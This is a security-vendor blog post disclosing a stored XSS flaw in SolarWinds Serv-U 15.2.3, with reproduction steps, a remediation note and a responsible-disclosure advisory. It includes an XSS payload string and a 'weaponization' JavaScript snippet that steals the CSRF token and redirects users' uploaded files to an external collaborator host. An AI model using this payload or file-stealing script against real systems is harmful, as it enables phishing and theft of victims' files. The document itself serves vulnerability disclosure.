Trustwave SpiderLabs Exposes Unique Cybersecurity Threats in the Public Sector. Learn More

Trustwave SpiderLabs Exposes Unique Cybersecurity Threats in the Public Sector. Learn More

Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Offensive Security
Solutions to maximize your security ROI
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

Solarwinds Serv-U 15.2.3 Share URL XSS (CVE-2021-32604)

Sometimes when pen-testing a large network you come across a few exposed web hosts running out-of-the-box software. When the rest of the test can run a little dry, I start attacking these hosts in hopes of finding some undiscovered vulnerabilities. In this example, I found a small, yet interesting vulnerability within the SolarWinds Serv-U FTP Server. Although the initial vector requires authentication, a low privileged user is able to create a publicly accessible URL that triggers an XSS payload when visited.

Discovery

Serv-U contains two features to send and receive files from others, when testing the 'Request Files' feature I noticed that the Sender Email input was not being encoded when being place in a publicly accessible share URL. This meant a discreet share URL could be sent to a victim.

Steps to reproduce

The following steps were tested on version 15.2.3, as the host, I was originally testing was running an older version, I downloaded a trial version to see if it was still applicable. Once authenticated, a user can go to the 'Request Files' tab to generate a file request URL.

1

 

Using dummy data and sending the request shows a publicly shareable URL.

2

 

Checking the generated URL shows a file upload form. Files uploaded here will be sent back to the link creator's Serv-U folder.

3

 

Now if we modify the original link generation request and include an XSS payload such as "'/><script>alert(7)%3b</script>%40localhost.local in the 'SenderEmail' field.

4

 

And then grab the 'ShareURL' from the response.

5

 

We now get XSS on the publicly shareable URL.

6

 

Weaponization

I thought of different ways that this could be weaponized, although it seemed that certain application flows prevented the interesting cookie stealing or CSRF fun that might happen when the URL is sent to a logged-in Serv-U user. Unfortunately, the web application for one reason or another does not actually load the shareable links when a user is already logged in......BUT I figured I wouldn't leave you empty-handed.

The next best thing I could think of was a man-in-the-middle attack, intercepting uploaded files and sending them to a 3rd party server without altering the view of the page.

The idea here is that perhaps during a Red Team or other social engineering event, access to a Serv-U account could Serv-U well as the URL's will be on a trusted domain.

It took a little bit of tweaking to get the files to upload correctly to Serv-U and be sent off at the same time due to the Async Ajax calls being used. The script can simply be hosted and then injected via XSS using <script> tags. 

In a nutshell, I have:

  • Grabbed the current CSRF token from the page
  • Re-written the 'SubmitForm' function to post to an external host instead
  • Called an Ajax method to POST the files to the original Serv-U host to ensure the original promise is met

var csrftoken = $('script').text().match(/(&CsrfToken='\+")(.*?)\";/)[2];
function SubmitForm(rForm, rFormsTargetFrame, sFileName, nTransferID, bIsVirtual) {
var bSubmitted = false;
SubmitOriginal(rForm, rFormsTargetFrame, sFileName, nTransferID, bIsVirtual);
if (rForm != null && rForm != undefined && rFormsTargetFrame != null && rFormsTargetFrame != undefined && sFileName != undefined && sFileName != null && sFileName != '' && nTransferID > 0) {
if (bIsVirtual == undefined || bIsVirtual == null)
bIsVirtual = 0;
var sAction = 'http://SOMEURL.burpcollaborator.net/Web Client/Share/MultipleFileUploadResult.htm?Command=UploadFileShare&TransferID=' + nTransferID + '&File=' + encodeURIComponent(sFileName) + '&ShareToken=' + g_sShareToken + '&IsVirtual=' + bIsVirtual + '&CsrfToken=' + csrftoken;
rForm.setAttribute('action', sAction);
rFormsTargetFrame.onload = null;
rFormsTargetFrame.src = '/Web Client/Share/MultipleFileUploadResetFrame.htm';
rForm.submit();
bSubmitted = true;
} else
ASSERT('Cannot submit form because function parameters are invalid.');
return bSubmitted;
}

function SubmitOriginal(rForm, rFormsTargetFrame, sFileName, nTransferID, bIsVirtual) {
jQuery.ajax({
url: '/Web Client/Share/MultipleFileUploadResult.htm?Command=UploadFileShare&TransferID=' + nTransferID + '&File=' + encodeURIComponent(sFileName) + '&ShareToken=' + g_sShareToken + '&IsVirtual=' + bIsVirtual + '&CsrfToken=' + csrftoken,
data: new FormData(rForm),
cache: false,
contentType: false,
processData: false,
method: 'POST'
});
}

 

Wrapping up

A neat little XSS vulnerability that is accessible from a discrete share URL on a trusted domain, no session hijacking but hopefully the file phisher gives you some other ideas on page hijacking. Thanks for reading this little blog, it's not the biggest bug out there but it's my first in the wild. Let's see what comes next.

Remediation

Administrators should make sure that they are upgraded to Serv-U 15.2.3 or the latest stable version.

Reference

This vulnerability was reported to SolarWinds in accordance with Trustwave's Responsible Disclosure policy. 

Advisory: TWSL2021-009 - Persistent Cross-Site Scripting in SolarWinds Serv-U FTP Server

 

Latest SpiderLabs Blogs

Important Security Defenses to Help Your CISO Sleep at Night

This is Part 13 in my ongoing project to cover 30 cybersecurity topics in 30 weekly blog posts. The full series can be found here.

Read More

2024 Public Sector Threat Landscape: Trustwave Threat Intelligence Briefing and Mitigation Strategies

Trustwave SpiderLabs’ 2024 Public Sector Threat Landscape: Trustwave Threat Intelligence Briefing and Mitigation Strategies report details the security issues facing public sector security teams as...

Read More

How to Create the Asset Inventory You Probably Don't Have

This is Part 12 in my ongoing project to cover 30 cybersecurity topics in 30 weekly blog posts. The full series can be found here.

Read More